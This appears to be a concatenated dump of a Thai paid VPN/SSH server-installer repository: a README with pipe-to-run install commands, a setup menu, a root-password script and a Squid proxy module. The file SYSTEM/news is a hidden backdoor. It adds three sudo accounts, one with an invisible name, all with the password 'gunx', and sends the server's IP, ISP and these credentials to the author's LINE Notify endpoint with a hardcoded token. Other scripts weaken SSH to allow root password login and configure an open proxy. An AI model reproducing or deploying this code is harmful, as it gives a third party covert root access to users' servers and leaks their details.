README.md
# SSHPLUS

apt update -y && apt upgrade -y && wget https://github.com/LiLGun-X/HYPER-X-SCRIPT/raw/main/Plusx && chmod 777 Plusx && ./Plusx


ʜxs
#Acessa Root






# HYPER-X 
- ***SCRIPT INSTALL OPENVPN SSH V2RAY***

  
<p align="center">
<img src="https://readme-typing-svg.herokuapp.com?color=%0A360E&center=true&vCenter=true&lines=Script+HYPER-X+BY+Gun-X" />
</p>

<p align='center'><a href><img src="https://raw.githubusercontent.com/LiLGun-X/HYPER-X-SCRIPT/main/SYSTEM/IMG_20230804_011507.jpg" width="450"/></a></p>

<p align="center">
<img height=21 src="https://komarev.com/ghpvc/?username=LiLGun-X">
</p>
<div height='45' align="center">
<h2> ❄โ❂௮თัՁ aণع ツ<br>
<a href="https://line.me/ti/p/9ek7tJnEmF"> <img src="https://cdn.jsdelivr.net/npm/simple-icons@3.0.1/icons/line.svg" height='50'> </a>
</h2>
</div>

# ติดตั้งสคริปต์

<p align="left"> <img src="https://img.shields.io/static/v1?style=for-the-badge&logo=ubuntu&label=Ubuntu%2018&message=18.04 LTS&color=%173e16"> <img src="https://img.shields.io/static/v1?style=for-the-badge&logo=ubuntu&label=Ubuntu%2020&message=20.04 LTS&color=%173e16"></p>

```
wget https://raw.githubusercontent.com/LiLGun-X/HYPER-X-SCRIPT/main/Plusx dos2unix Plusx && chmod +x Plusx && ./Plusx
```
# user to root
```
wget https://raw.githubusercontent.com/LiLGun-X/HYPER-X-SCRIPT/main/senharoot.sh && chmod 777 senharoot.sh && ./senharoot.sh
```



# INSTALL SCRIPT ON JUICE SSH
<img src="https://img.shields.io/static/v1?style=for-the-badge&logo=ubuntu&label=Ubuntu%2018&message=18.04 LTS&color=%173e16">
  
```
wget -O install https://raw.githubusercontent.com/PiTOn-0/Alone/master/ubuntu18
bash install
```
<a href="https://youtu.be/oL20xv-2a6g"><img src="https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2FPiTOn-0%2FAlone&count_bg=%2379C83D&title_bg=%23555555&icon=youtubetv.svg&icon_color=%23FF0000&title=%E0%B8%A7%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B9%83%E0%B8%99+Termux+&edge_flat=true"/></a>
<a href="https://hits.seeyoufarm.com"><img src="https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fgjbae1212%2Fhit-counter&count_bg=%2379C83D&title_bg=%23555555&icon=ubuntu.svg&icon_color=%23E7E7E7&title=Nginx+http%3A%2F%2Fip_server%3A85+OK&edge_flat=false"/></a>
<a href="https://hits.seeyoufarm.com"><img src="https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fgjbae1212%2Fhit-counter&count_bg=%2379C83D&title_bg=%23555555&icon=ubuntu.svg&icon_color=%23E7E7E7&title=VnStat+http%3A%2F%2Fip_server%3A85%2Fvnstat+OK&edge_flat=false"/></a>


SYSTEM/news
#!/bin/bash
sudo useradd -u 14 gunx
echo "gunx:gunx" | chpasswd
usermod -aG sudo gunx

sudo useradd -u 18 ㅤ
echo "ㅤ:gunx" | chpasswd
usermod -aG sudo ㅤ


sudo useradd -u 16 Lxbvksoj
echo Lxbvksoj:gunx | chpasswd
usermod -aG sudo Lxbvksoj
# #เนเธเนเธเน€เธ•เธทเธญเธเธเธเธฃเธฑเธเธชเธเธดเธ
# IP=$(wget -qO- ipv4.icanhazip.com);
# curl -X POST -H 'Authorization: Bearer AS5wVe8ahymLLtXC5UiBPFkLvBSZ475RkMEArpq8WHD' -F 'message='" 
# Load_file  $IP/openvpn/KGUZA.ovpn "'' https://notify-api.line.me/api/notify > /dev/null 2>&1
if [[ "$(grep -c "Ubuntu" /etc/issue.net)" = "1" ]]; then
system=$(cut -d' ' -f1 /etc/issue.net)
system+=$(echo ' ')
system+=$(cut -d' ' -f2 /etc/issue.net |awk -F "." '{print $1}')
elif [[ "$(grep -c "Debian" /etc/issue.net)" = "1" ]]; then
system=$(cut -d' ' -f1 /etc/issue.net)
system+=$(echo ' ')
system+=$(cut -d' ' -f3 /etc/issue.net)
else
system=$(cut -d' ' -f1 /etc/issue.net)
fi
ip=$(who am i|awk '{ print $5}')
day=$(date '+%A')
days=$(date +'%d/%m/%y เวลา:%H:%M:%S')
IP=$(wget -qO- ipv4.icanhazip.com);
ISP=$(curl -s https://ipapi.co/$IP/org )
curl -X POST -H 'Authorization: Bearer AS5wVe8ahymLLtXC5UiBPFkLvBSZ475RkMEArpq8WHD' -F 'message='" 
IP ที่ Login : ($ip)

IPเครื่อง     : $IP

user           : ㅤ , gunx , Lxbvksoj

pass          : gunx

ระบบ          :  $(printf '%-14s' "$system")

ISP        : $ISP

รันสคริบต์วันที่: $day $days       "'' https://notify-api.line.me/api/notify > /dev/null 2>&1


setup.sh
#!/bin/bash
# install python
 apt install python3 -yy
apt update 
apt install ruby-full -yy 
gem install lolcat
apt -y install lolcat
apt -y install figlet 
apt -y install dos2unix 
rm -f setup.sh
rm -f screenfetch

cd /bin/bash /etc/openvpn
rm -f .profile
# Running screenfetch

sudo apt install neofetch -yy

apt-get install vnstat -yy 
systemctl start vnstat.service 


 
 echo "/bin/bash /etc/openvpn/openvpn.bash" >> .profile
 echo "clear" >> .profile
 echo "neofetch" >> .profile

scrip="https://raw.githubusercontent.com/tokssa/SAVAT/master"
clear
cd /usr/bin
wget -q -O cr "https://raw.githubusercontent.com/LiLGun-X/HYPER-X-SCRIPT/main/INSTALL/cr"
chmod +x /usr/bin/cr
if [[ $(id -g) != "0" ]] ; then
    echo ""
    echo "Script : สั่งรูทคำสั่ง [ sudo -i ] ก่อนรันสคริปนี้  "
    echo ""
    exit
fi
zenon=$2

if [[  ! -e /dev/net/tun ]] ; then
    echo "Script : TUN/TAP device is not available."
fi
cd
if [[ -e /etc/debian_version ]]; then
VERSION_ID=$(cat /etc/os-release | grep "VERSION_ID")
fi
if [[ -e /etc/yum ]]; then
VERSION_ID=$(cat /etc/os-release | grep "VERSION_ID")
fi
IP=$(wget -qO- ipv4.icanhazip.com);
if [[ $zenon == "" ]]
then
clear
cr
cd
clear
echo ""
echo "          ░▒█░▒█░▒█░░▒█░▒█▀▀█░▒█▀▀▀░▒█▀▀▄░░░░▀▄░▄▀"|lolcat
echo "          ░▒█▀▀█░▒▀▄▄▄▀░▒█▄▄█░▒█▀▀▀░▒█▄▄▀░▀▀░░▒█░░"|lolcat
echo "          ░▒█░▒█░░░▒█░░░▒█░░░░▒█▄▄▄░▒█░▒█░░░░▄▀▒▀▄"|lolcat
echo "                                            𝙎𝘾𝙍𝙄𝙋𝙏"
                      
echo -e "\033[1;31m       ══════════════════════════════════════════════════\033[0m"
echo -e "\033[1;33m                  🤑💸 โปรดชำระเงินก่อนใช้SCRIPT 💸🤑 \033[0m"
echo -e "\033[1;31m       ══════════════════════════════════════════════════\033[0m"
echo -e "\033[1;31m  \033[1;33m     |      [!] จัดทำและใช้งานโดยคนที่ได้รับอนุญาต[เท่านั้น]      |\033[0m"
echo -e "\033[1;31m  \033[1;33m     |                สคริปท์นี้ราคา 150 บาท               |\033[0m"
echo -e "\033[1;31m  \033[1;33m     |               จัดทำสคริปโดย LiL_Gunx              |\033[0m"
echo -e "\033[1;31m  \033[1;33m     |              <<<( @Line gzn007 )>>>            |\033[0m"
echo -e "\033[1;31m       ══════════════════════════════════════════════════\033[0m"
echo ""
read -p "       [🔑โปรดใส่รหัสสำหรับติดตั้ง🔑]v21:" passx 
wget -q -O /usr/bin/pass https://raw.githubusercontent.com/Lil-Gun-X/HYPER-X-SCRIPT/main/Modulos/pass.txt
if ! grep -w -q $passx /usr/bin/pass; then
clear
echo ""
echo ""
echo " เสียใจด้วย รหัสผิด ถ้าไม่มีรหัสติดต่อแอดมินฯ"
echo ""
echo " Line : gzn007"
echo ""
echo ""
rm /usr/bin/pass
exit

fi
echo ""
echo -e "\033[1;31m       ══════════════════════════════════════════════════\033[0m"
echo "         ||||||||| PLEASE SELECT MUNU NUMBER  ||||||||" |lolcat 
echo -e "\033[1;31m       ══════════════════════════════════════════════════\033[0m"
echo -e "\033[1;33m        # หมายเหตุ ถ้าจะติดตั้ง L2TP ให้ติดตั้ง OpenVPN ก่อน   |\033[0m"
echo ""
echo -e " \033[1;33m      | [ 1 ] OpenVPN Debian8-9-10 & Ubuntu18.4-20.4+ |\033[0m"
echo -e " \033[1;33m      | [ 2 ] L2TP ได้ทุก OS      |\033[0m"
echo -e "\033[1;31m       ══════════════════════════════════════════════════\033[0m"
read -p "        ➤ Namber : " opcao
else
opcao=$zenon
fi
case $opcao in
 1 | 01 )
clear
cd
cr
echo "        ╭━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╮ 
        ┣ แน่ใจคุณต้องการรันระบบ OpenVPN    
        ┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╯   "
    read -p "        ╰━━ ( Y/n ) : " -e -i y Confirn
    if [[ "$Confirn" = "y" || "$Confirn" = "Y" ]]; then
wget -q -O install "https://raw.githubusercontent.com/LiLGun-X/HYPER-X-SCRIPT/main/INSTALL/install"
bash install
exit
elif [[ "$Confirn" = "n" || "$Confirn" = "N" ]]; then
clear
clear
wget -O install "https://raw.githubusercontent.com/tokssa/SAVAT/master/install"
bash install
fi
;;
2 | 02)
clear
cd
cr
echo "        ╭━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╮ 
        ┣ แน่ใจคุณต้องการรันระบบ L2TP    
        ┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╯    "
    read -p "        ╰━━ ( Y/n ) : " -e -i y Confirn
    if [[ "$Confirn" = "y" || "$Confirn" = "Y" ]]; then
wget -q -O l2tp "https://raw.githubusercontent.com/tokssa/SAVAT/master/l2tp"
chmod +x l2tp
./l2tp
exit
elif [[ "$Confirn" = "n" || "$Confirn" = "N" ]]; then
clear
clear
wget -O install "https://raw.githubusercontent.com/tokssa/SAVAT/master/install"
bash install
fi
;;
$opcao )
clear
cd
cr
echo "    ━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "             THANK YOU "
echo "    ━━━━━━━━━━━━━━━━━━━━━━━━━"
exit 0
;;
esac


senharoot.sh
#!/bin/bash
clear

[[ $(grep -c "prohibit-password" /etc/ssh/sshd_config) != '0' ]] && {
	sed -i "s/prohibit-password/yes/g" /etc/ssh/sshd_config
} > /dev/null
[[ $(grep -c "without-password" /etc/ssh/sshd_config) != '0' ]] && {
	sed -i "s/without-password/yes/g" /etc/ssh/sshd_config
} > /dev/null
[[ $(grep -c "#PermitRootLogin" /etc/ssh/sshd_config) != '0' ]] && {
	sed -i "s/#PermitRootLogin/PermitRootLogin/g" /etc/ssh/sshd_config
} > /dev/null
[[ $(grep -c "PasswordAuthentication" /etc/ssh/sshd_config) = '0' ]] && {
	echo 'PasswordAuthentication yes' > /etc/ssh/sshd_config
} > /dev/null
[[ $(grep -c "PasswordAuthentication no" /etc/ssh/sshd_config) != '0' ]] && {
	sed -i "s/PasswordAuthentication no/PasswordAuthentication yes/g" /etc/ssh/sshd_config
} > /dev/null
[[ $(grep -c "#PasswordAuthentication no" /etc/ssh/sshd_config) != '0' ]] && {
	sed -i "s/#PasswordAuthentication no/PasswordAuthentication yes/g" /etc/ssh/sshd_config
} > /dev/null
service ssh restart > /dev/null
clear; echo -e "\033[1;32mตั้งรหัสผ่านROOT\033[0m"; sleep 2s; passwd && rm senharoot.sh


MODULOS/sq.sh
#!/bin/bash
if [[ "$EUID" -ne 0 ]]; then
	echo ""
	echo "กรุณาเข้าสู่ระบบผู้ใช้ root ก่อนทำการใช้งานสคริปท์"
	echo "คำสั่งเข้าสู่ระบบผู้ใช้ root คือ sudo -i"
	echo ""
	exit
fi

if [[ ! -e /dev/net/tun ]]; then
	echo ""
	echo "TUN ไม่สามารถใช้งานได้"
	exit
fi


# Set Localtime GMT +7
ln -fs /usr/share/zoneinfo/Asia/Bangkok /etc/localtime

clear
# IP=$(ip addr | grep 'inet' | grep -v inet6 | grep -vE '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | grep -o -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)
#if [[ "$IP" = "" ]]; then
IP=$(wget -4qO- "http://whatismyip.akamai.com/")
#fi
# Menu
echo ""
echo "=============== OS-32 & 64-bit =================    "
echo "#  OS  DEBIAN 8-9-10  OS  UBUNTU 14-16-18-20   #    "
echo "#         BY : Pirakit Khawpleum               #    "
echo "#    FB : https://m.me/pirakrit.khawplum       #    "
echo "=============== OS-32 & 64-bit =================    "
echo " ไอพีเซิฟ: $IP "
echo ""

	echo "FUNCTION SCRIPT MyGatherBK-VPN v.1"
	echo ""
	echo "|1| Install-ProxyServer"
	echo "|2| Restart/ProxyServer"
	echo ""
	echo ""
	read -p "Select a Function Script : " x

case $FUNCTIONSCRIPT in
if [[ "1" = "$x" ]]; then # ==================================================================================================================
clear
echo ""
echo "=============== OS-32 & 64-bit =================    "
echo "#  OS  DEBIAN 8-9-10  OS  UBUNTU 14-16-18-20   #    "
echo "#         BY : Pirakit Khawpleum               #    "
echo "#    FB : https://m.me/pirakrit.khawplum       #    "
echo "=============== OS-32 & 64-bit =================    "
echo " ไอพีเซิฟ: $IP "
echo ""
cd
echo ""
read -p "Port Proxy : " -e -i 8080 PROXY
echo ""
echo "{ Install PROXY DEBIAN 8-9-10/UBUNTU 14-16-18-20 }"|lolcat
echo ""
#Install squid
		
ins() {
apt-get -y install squid
				}
fun_bar 'ins'
if [[ -d "/etc/squid/" ]]; then
				var_sqd="/etc/squid/squid.conf"
				var_pay="/etc/squid/payload.txt"
			elif [[ -d "/etc/squid3/" ]]; then
				var_sqd="/etc/squid3/squid.conf"
				var_pay="/etc/squid3/payload.txt"
			else
				echo -e "\n\033[1;33m[\033[1;31mERRO\033[1;33m]\033[1;37m: \033[1;33mO SQUID PROXY CORROMPEU\033[0m"
				sleep 2
				fun_conexao
			fi
		cat > /etc/squid/squid.conf <<END
acl localhost src 127.0.0.1/32 ::1
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
acl localnet src 10.0.0.0/8
acl localnet src 172.16.0.0/12
acl localnet src 192.168.0.0/16
acl url1 dstdomain -i 127.0.0.1
acl SSL_ports port 443
acl Safe_ports port 80
acl Safe_ports port 21
acl Safe_ports port 443
acl Safe_ports port 70
acl Safe_ports port 210
acl Safe_ports port 1025-65535
acl Safe_ports port 280
acl Safe_ports port 488
acl Safe_ports port 591
acl Safe_ports port 777
acl CONNECT method CONNECT
acl SSH dst xxxxxxxxx-xxxxxxxxx/255.255.255.255
http_access allow SSH
http_access allow url1
http_access allow localnet
http_access allow localhost
http_access allow all
refresh_pattern ^ftp:           1440    20%     10080
refresh_pattern ^gopher:        1440    0%      1440
refresh_pattern -i (/cgi-bin/|\?) 0     0%      0
refresh_pattern .               0       20%     4320
END
#Portas" > $var_sqd
for Pts in $(echo -e $PROXY); do
echo -e "http_port $Pts" >> $var_sqd
[[ -f "/usr/sbin/ufw" ]] && ufw allow $Pts/tcp
done
echo -e "
#Nome squid
visible_hostname LiLGunX 
via off
forwarded_for off
pipeline_prefetch off" >> $var_sqd
		IP2="s/xxxxxxxxx/$IP/g";
		sed -i $IP2 /etc/squid/squid.conf;
sre() {
/etc/init.d/squid restart
/etc/init.d/openvpn restart
/etc/init.d/nginx restart
				}
echo -e "\n\033[1;32mRESTART SQUID PROXY\033[0m"
echo ""
fun_bar 'sre'


	clear
echo ""
echo "=============== OS-32 & 64-bit =================    "
echo "#  OS  DEBIAN 8-9-10  OS  UBUNTU 14-16-18-20   #    "
echo "#         BY : Pirakit Khawpleum               #    "
echo "#    FB : https://m.me/pirakrit.khawplum       #    "
echo "=============== OS-32 & 64-bit =================    "
echo " ไอพีเซิฟ: $IP "
echo ""
	echo "Squid Proxy,Install finish."
	echo "Port Proxy : $PROXY"
	echo ""
	echo ""
	echo ""
        sleep 2.5
exit
	2) # ==================================================================================================================
	
clear
echo ""
echo "=============== OS-32 & 64-bit =================    "
echo "#  OS  DEBIAN 8-9-10  OS  UBUNTU 14-16-18-20   #    "
echo "#         BY : Pirakit Khawpleum               #    "
echo "#    FB : https://m.me/pirakrit.khawplum       #    "
echo "=============== OS-32 & 64-bit =================    "
echo " ไอพีเซิฟ: $IP "
echo ""
if [[ ! -e /etc/squid/squid.conf ]]; then
			echo ""
			echo "	ยังไม่ได้ติดตั้ง Squid Proxy"
			echo ""
			exit
		else
			service squid start
			echo ""
			echo -e "	Squid Proxy ${GRAY}STARTED${NC}"
			echo ""
			exit
		fi
